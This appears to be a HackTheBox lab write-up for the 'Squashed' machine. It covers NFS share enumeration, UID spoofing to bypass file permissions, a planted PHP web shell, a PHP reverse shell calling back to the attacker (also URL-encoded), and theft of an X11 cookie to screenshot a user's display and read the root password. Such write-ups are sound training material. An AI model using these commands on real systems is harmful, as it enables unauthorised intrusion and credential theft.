Squashed

Squashed writeup by Thamizhiniyan C S

Overview

Greetings everyone,

In this write-up, we will tackle Squashed from HackTheBox.

Machine link: Squashed

Difficulty Level: Easy

Let's Begin 🙌

Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.

Once connected to the VPN service, click on "Join Machine" to access the machine's IP.

Upon joining the machine, you will be able to view the IP address of the target machine.

Reconnaissance

Nmap Agressive Scan

nmap -A -T4 -v <TARGET>

Results

Ports	Services	Service Version
22	SSH	OpenSSH 8.2p1
80	HTTP	Apache httpd 2.4.41
111	rpcbind	-

Information Gathering - Port 80

First we will take a look at the website that is running on port 80. After surfing the site we found nothing interesting.

Enumerating the NFS Shares

Showmount

First we have to start the enumeration by listing the available shares that is hosted by the target machine. To do that we use the command

showmount -e <IP-ADDRESS>

We can see two file-shares. These shares are globally accessible which is denoted by the start ( * ). Now we can access these shares and look into the contents of these shares. To do that we have to manually mount the NFS shares to our local Kali machine.

Mounting the NFS Shares

To mount the NFS shares, First we have to create two directories for mounting them. I have created two directories ross and html to mount the shares /home/ross and /var/www/html respectively.

Next we have to mount these shares by using the command:

sudo mount -t nfs <IP-ADDRESS>:<TARGET-SHARE-NAME> <MOUNTING-LOCATION>

Enumerating Shares: /home/ross

Now we have mounted the shares to our local machine. Now let’s take a look at these shares. First we will take a look at the /home/ross share by switching the directory to ross .

We have discovered a Passwords.kdbx file. This file is a keypass database file. Let’s try to crack this by using the keypass2john tool. The command is keypass2john <FILE>.

keepass2john throws an error that this version of Keypass database is not supported by it. So we can do nothing with this file. So let’s further search for anything interesting.

Enumerating Shares: /var/www/html

We haven’t found anything interesting in the /home/ross share so we can now take a look at the /var/www/html share by switching the directory to the html directory. When we try to switch directory, we are facing with a permission denied error. If we run the command ls -al , we could see that the html share has user id of 2017. This means that this particular share can be accessed only by the user who has an id of 2017.

To bypass this access control, we will create a user with a user id of 2017 in our local machine. With this newly created user we can access the html share. We create a new user with the desired user id by the following command : adduser <USERNAME> —uid 2017.

After creating the user, we switch to the new user created. To switch user we use the command : su <USERNAME>. After switching the user we switch directory to the html directory and we can start our enumerating process.

We could see that there is nothing interesting is found in this directory. And we can infer that this directory contains all the files of the website that is hosted on the target.

Initial Access

Given that the /var/www/html share houses all the files of the website hosted on the target, we could craft a straightforward backdoor within this share and then attempt to establish a reverse shell connection to the target machine.

We can create a simple PHP backdoor in the current working directory :

Backdoor: `<?php echo system($_GET[”cmd”]) ?>`

We can check whether our backdoor is working by sending a GET request using the cmd parameter that we have created using the backdoor.

To verify the functionality of our backdoor, we can send a GET request to http://<IP-ADDRESS>/backdoor.php, including the desired command to execute on the target machine as a parameter named cmd.

GET Request : http://<IP-ADDRESS>/backdoor.php?cmd=id

Our backdoor is working as we get the id of the user of the target machine. Let’s note the user details for further enumeration.

username : `alex`
uid : `2017`

Now we can use a simple PHP reverse shell:

php -r '$sock=fsockopen("<IP-ADDRESS>",1234);exec("/bin/sh -i <&3 >&3 2>&3");’

We have to URL encode this reverse shell to use it as a parameter value in the URL. To do that, use the following site https://www.urlencoder.org/ to encode the above mentioned reverse shell.

After encoding we will obtain a reverse shell like this:

php%20-r%20%27%24sock%3Dfsockopen%28%22%3CIP-ADDRESS%3E%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%E2%80%99

The next step is to start a listener to listen for connection from the reverse shell that we have created. To start a listener use the following command in a new terminal:

nc -nvlp 1234

After creating a listener, now we can supply the reverse shell as a parameter in the URL :

http://<IP-ADDRESS>/backdoor.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22%3CIP-ADDRESS%3E%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%E2%80%99

Now if we press enter we can see that the site is continuously loading and if check our listener we could see that we have received back a shell.

Getting the User Flag

Now we can start enumerating the target machine. Let’s first check the /home/alex directory.

Hooray!!! we have found the user.txt file, our first flag in the home directory of alex. Our next step is to find our root flag.

Privilege Escalation

Lets first try to switch to the root directory.

We can see that we don’t have access to the root directory. Now we have to find a way to escalate our privilege as root. So first we can check the /etc/passwd file for finding the other users.

In the /etc/passwd file we can see the presence of the LightDM display manager. Remember that in our initial stages of enumerating the share /home/ross , we had found the presence of .Xauthority and .xsession-errors files. This show the possibility of some display is connected and configured using the x11 manager.

So what is X11 ?

The X Window System (X11, or simply X) is a windowing system for bitmap displays, common on Unix-like operating systems.

X provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard. X does not mandate the user interface – this is handled by individual programs. As such, the visual styling of X-based environments varies greatly; different programs may present radically different interfaces. (Source: https://en.wikipedia.org/wiki/X_Window_System)

The presence of .Xauthority and .xsession files in the home directory indicate that a display might be configured, with ross potentially already authenticated. This theory is further supported by the fact that the display manager LightDM is found in the /etc/passwd file.

Let’s check whether any any display is connected in the target machine by running the following command w.

We can see that the user ross has connected to the display of id :0 .

Now let’s check what does the .Xauthority and .xsession-errors file contains.

We can see that we don’t have access to these files.

We can see that the .Xauthority and .xsession-errors files can only be accessed by the user with a uid of 1001 . So we have to create user with a uid of 1001 to access these files.

Now we have created a new user with a uid of 1001 . Now switch to the new user that we have created by using the command su <USERNAME>. Now we can try to see contents of the .Xauthority file.

We can see that the .Xauthority contains the cookie of the ross users x11 session. Now we can use this cookie to act as user ross and we can gain access to the display. After gaining access, we can take try to take screenshots of the connected display to see the contents of the display.

Now we have to move this .Xauthority cookie file to the alex user’s directory to gain access to the display. To do that we will copy this .Xauthority file to the /tmp folder and we will host a simple http server from the /tmp directory.

Now we have copied the file to the /tmp directory. Next step is to host a simple http webserver. We can do this by using the python simple http.server module. To do this use the following command : python -m http.server

Now you can see that our /tmp is hosted on port 8000. Now from the reverse shell we obtained to the /home/alex directory, use the following command to download the .Xauthority file from our local machine.

Note : In this case we have to use our local machine’s tun0 ip address to download the file.

Command : wget http://<tun0-IP-ADDRESS>:8000/<FILENAME>

Now we have downloaded the .Xauthority file to the /home/alex directory. Now we have to set this cookie. To set the cookie we have to have to point the downloaded .Xauthority file to the XAUTHORITYenvironment variable. To do that use the following command :

export XAUTHORITY=<LOCATION-TO-THE-FILE>

Now we have set the cookie successfully. Our next step is to take a screenshot of the display.

To take screenshot we can use the following command:

Reference : https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11

In our case the command will be:

xwd -root -screen -silent -display <DISPLAY-ID> > <OUTPUT-FILE>

Details of the flags used :

-root : selects the root window

-screen : send GetImage request to root window

-silent : operate silently

-display : specify the display

Now we have successfully obtained the screenshot. Now we have to copy this image to our local machine. To copy this file to our local machine we can make use of the website that is hosted in the target machine. Now move the scrshot.xwd file to /var/www/html directory. We know that we have access to the /var/www/html directory in our local machine as we have mounted the shares. So now check the /var/www/html share in our local machine, we can find the scrshot.xwd file.

Now we can copy this file to the /tmp directory.

Now we can convert the scrshot.xwd file to png file in the /tmp folder. We can do this by using the following command : convert scrshot.xwd scrshot.png

Now we can open the scrshot.png file to see the contents of it.

We can see a password manager with the root user’s password in the screenshot. Remember that our target machine has the ssh service open in port 22. Now we can use these credentials to ssh into the target machine.